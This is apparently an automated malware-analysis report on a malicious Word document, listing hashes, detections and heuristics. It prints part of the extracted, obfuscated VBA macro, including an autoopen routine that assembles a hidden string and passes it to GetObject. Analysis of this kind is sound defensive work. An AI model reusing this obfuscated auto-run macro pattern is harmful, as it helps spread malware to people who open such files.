Office (OLE) malware analysis — malicious · dcd20491357accce

MALICIOUS

Office (OLE)

102.1 KB Created: 2019-04-09 11:57:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 3a865fb3c510ccfd86049df13055e5ab SHA-1: 9149682026b09375a56b6cc44c0abad81e353dc1 SHA-256: dcd20491357acccec2399db05b82d2e413a36a3287ccecb73a57a8c1e2d8f97c

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of GetObject calls within the VBA p-code suggests an attempt to execute code, likely to download and run a secondary payload. No specific family could be identified, and no external URLs or executable payloads were directly extracted from the provided evidence.

Heuristics 7

ClamAV: Doc.Malware.00536d-6935149-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6935149-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22803 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22803 bytes
SHA-256: `88b29fe1af585fc026ccdac870d939ebb1738999285dc0d4ae05469fcd17fce4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XAxAGAGw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WAAXGUD" Attribute VB_Base = "0{8DAF25A1-E408-4322-B533-871FAE1A45B9}{F4A58151-8D57-4927-97CE-1C9C0AF39C73}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "NAD1DAA" Attribute VB_Base = "0{9B8420C6-1C2B-4907-86E9-82DA19FBF188}{B0254524-F8B5-45C0-8548-63E646B645F4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "DA4cA1" Function GDAUABAC() If D1AAwA > V_AUUAQD Then cZ4ZAD _ = 220963627 - _ fAwA_AoB If kAAAxAA < _ tD11GUA Then Hour _ Rnd _ (TcBxQZC) End If End If Set kcQUAc _ = VX4BGBG If JoADAZk > pAUAQAwA Then aXcGXB_U _ = 292625136 - _ qAU_QA If ZAG4CC < _ bAcwUA Then Hour _ Rnd _ (Kwcw_D) End If End If Set jcGUoxZ _ = sUBBxU End Function Sub autoopen() GAGBxA End Sub Function mQA1_A() If jDQAUcB > XDAAAAA Then S4AAAcc _ = 755750517 - _ hAcUUAAA If z_AUxU < _ X_ZUZk Then Hour _ Rnd _ (WABAAA) End If End If Set KZUAxUZ _ = WoADAA If KAkwXcU > pAAADGZA Then kAQACABA _ = 565747919 - _ HABDAADD If iQ4BA4xC < _ jCoBQGAX Then Hour _ Rnd _ (qQkG4B) End If End If Set LkDAAA _ = nZBAUACD End Function Attribute VB_Name = "TXAQox" Function ZABAAAXX() If ucAAAZUU > FAUUUAA Then GZQAAA _ = 591010747 - _ zoZDDAx If sAAAAw < _ JAAkABA Then Hour _ Rnd _ (TAkAwwD) End If End If Set CAXDUQA _ = zAXAAUB If PQBUAA_ > MAAAkCX Then mxAUXAx _ = 609547665 - _ GkxB1DAA If H_AUGcw < _ AAAQD_B Then Hour _ Rnd _ (FDQA4QA) End If End If Set aADQ1cA _ = oAXQAA End Function Function GAGBxA() On Error Resume Next If ZoUAAwX > dBDADAA Then rAoAAA _ = 62144012 - _ sDGZwA If jAGAxA < _ AxCAUDA Then Hour _ Rnd _ (EUwBAGG) End If End If Set wQAAAo _ = vDcAA1 If uAUDDB_ > Q_UDAo Then tXAcB_D _ = 275377616 - _ GQZA_AD If jcoDkUDQ < _ nwGAAwD Then Hour _ Rnd _ (XADQ_A) End If End If Set Nx1AACAA _ = Q1_CAUDA If GokAcA > iQABDA Then c144AG _ = 690343970 - _ nDDB4U If wAUAAx < _ m_Aocw1 Then Hour _ Rnd _ (toC4_XQB) End If End If Set TAcAkAA _ = vUAQCUX uQADA4AA = NAD1DAA.lUAAxB + NAD1DAA.QAGBDQB + NAD1DAA.lUAAxB + NAD1DAA.qx1BcA_w + NAD1DAA.lUAAxB If tGUDBA > DQADAG Then UADw_BDA _ = 729503958 - _ oxADBU If aBxUGA < _ QDU_AA Then Hour _ Rnd _ (iCA1BcD) End If End If Set d1xAQUZ_ _ = UwAX_ZQ If q1UC_Qo > jABD_QA1 Then i4kGUoQc _ = 875481624 - _ mDBDxA If fXADACU < _ zAcUAZxC Then Hour _ Rnd _ (FCBxkG) End If End If Set AUAAAQc _ = M_U1ABxA Set N4AAXDDA = GetObject(NAD1DAA.lUAAxB + NAD1DAA.QAGBDQB + NAD1DAA.lUAAxB + NAD1DAA.qx1BcA_w + NAD1DAA.lUAAxB + NAD1DAA.rZwDAGAA + NAD1DAA.lUAAxB) If jAAUwG > GAGAQx Then QA1AQQQ _ = 412465078 - _ jAACAcA If dBADQQ < _ l1ADU1A Then Hour _ Rnd _ (lQoQwAQ) End If End If Set pAkUAQo _ = CQQAAADk If hUwACcAD > i_1DDc Then UDAAAC _ = 371577735 - _ aUCAAA If wB_AAC_D < _ fwAG_G Then Hour _ Rnd _ (qAQAowA) End If End If Set IXBA_AAk _ = nA_ADAQ If 33994 = 33994 Then If mAZGXDDB > lAU_DA ... (truncated)

SHA-256: 88b29fe1af585fc026ccdac870d939ebb1738999285dc0d4ae05469fcd17fce4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XAxAGAGw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WAAXGUD"
Attribute VB_Base = "0{8DAF25A1-E408-4322-B533-871FAE1A45B9}{F4A58151-8D57-4927-97CE-1C9C0AF39C73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NAD1DAA"
Attribute VB_Base = "0{9B8420C6-1C2B-4907-86E9-82DA19FBF188}{B0254524-F8B5-45C0-8548-63E646B645F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "DA4cA1"
Function GDAUABAC()
      If D1AAwA > V_AUUAQD Then
      cZ4ZAD _
= 220963627 - _
fAwA_AoB
      If kAAAxAA < _
tD11GUA Then
         Hour _
Rnd _
(TcBxQZC)
      End If
   End If
   Set kcQUAc _
= VX4BGBG
      If JoADAZk > pAUAQAwA Then
      aXcGXB_U _
= 292625136 - _
qAU_QA
      If ZAG4CC < _
bAcwUA Then
         Hour _
Rnd _
(Kwcw_D)
      End If
   End If
   Set jcGUoxZ _
= sUBBxU
End Function
Sub autoopen()
GAGBxA
End Sub
Function mQA1_A()
      If jDQAUcB > XDAAAAA Then
      S4AAAcc _
= 755750517 - _
hAcUUAAA
      If z_AUxU < _
X_ZUZk Then
         Hour _
Rnd _
(WABAAA)
      End If
   End If
   Set KZUAxUZ _
= WoADAA
      If KAkwXcU > pAAADGZA Then
      kAQACABA _
= 565747919 - _
HABDAADD
      If iQ4BA4xC < _
jCoBQGAX Then
         Hour _
Rnd _
(qQkG4B)
      End If
   End If
   Set LkDAAA _
= nZBAUACD
End Function


Attribute VB_Name = "TXAQox"
Function ZABAAAXX()
      If ucAAAZUU > FAUUUAA Then
      GZQAAA _
= 591010747 - _
zoZDDAx
      If sAAAAw < _
JAAkABA Then
         Hour _
Rnd _
(TAkAwwD)
      End If
   End If
   Set CAXDUQA _
= zAXAAUB
      If PQBUAA_ > MAAAkCX Then
      mxAUXAx _
= 609547665 - _
GkxB1DAA
      If H_AUGcw < _
AAAQD_B Then
         Hour _
Rnd _
(FDQA4QA)
      End If
   End If
   Set aADQ1cA _
= oAXQAA
End Function
Function GAGBxA()
On Error Resume Next
      If ZoUAAwX > dBDADAA Then
      rAoAAA _
= 62144012 - _
sDGZwA
      If jAGAxA < _
AxCAUDA Then
         Hour _
Rnd _
(EUwBAGG)
      End If
   End If
   Set wQAAAo _
= vDcAA1
      If uAUDDB_ > Q_UDAo Then
      tXAcB_D _
= 275377616 - _
GQZA_AD
      If jcoDkUDQ < _
nwGAAwD Then
         Hour _
Rnd _
(XADQ_A)
      End If
   End If
   Set Nx1AACAA _
= Q1_CAUDA
      If GokAcA > iQABDA Then
      c144AG _
= 690343970 - _
nDDB4U
      If wAUAAx < _
m_Aocw1 Then
         Hour _
Rnd _
(toC4_XQB)
      End If
   End If
   Set TAcAkAA _
= vUAQCUX
uQADA4AA = NAD1DAA.lUAAxB + NAD1DAA.QAGBDQB + NAD1DAA.lUAAxB + NAD1DAA.qx1BcA_w + NAD1DAA.lUAAxB
      If tGUDBA > DQADAG Then
      UADw_BDA _
= 729503958 - _
oxADBU
      If aBxUGA < _
QDU_AA Then
         Hour _
Rnd _
(iCA1BcD)
      End If
   End If
   Set d1xAQUZ_ _
= UwAX_ZQ
      If q1UC_Qo > jABD_QA1 Then
      i4kGUoQc _
= 875481624 - _
mDBDxA
      If fXADACU < _
zAcUAZxC Then
         Hour _
Rnd _
(FCBxkG)
      End If
   End If
   Set AUAAAQc _
= M_U1ABxA
Set N4AAXDDA = GetObject(NAD1DAA.lUAAxB + NAD1DAA.QAGBDQB + NAD1DAA.lUAAxB + NAD1DAA.qx1BcA_w + NAD1DAA.lUAAxB + NAD1DAA.rZwDAGAA + NAD1DAA.lUAAxB)
      If jAAUwG > GAGAQx Then
      QA1AQQQ _
= 412465078 - _
jAACAcA
      If dBADQQ < _
l1ADU1A Then
         Hour _
Rnd _
(lQoQwAQ)
      End If
   End If
   Set pAkUAQo _
= CQQAAADk
      If hUwACcAD > i_1DDc Then
      UDAAAC _
= 371577735 - _
aUCAAA
      If wB_AAC_D < _
fwAG_G Then
         Hour _
Rnd _
(qAQAowA)
      End If
   End If
   Set IXBA_AAk _
= nA_ADAQ
If 33994 = 33994 Then
      If mAZGXDDB > lAU_DA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.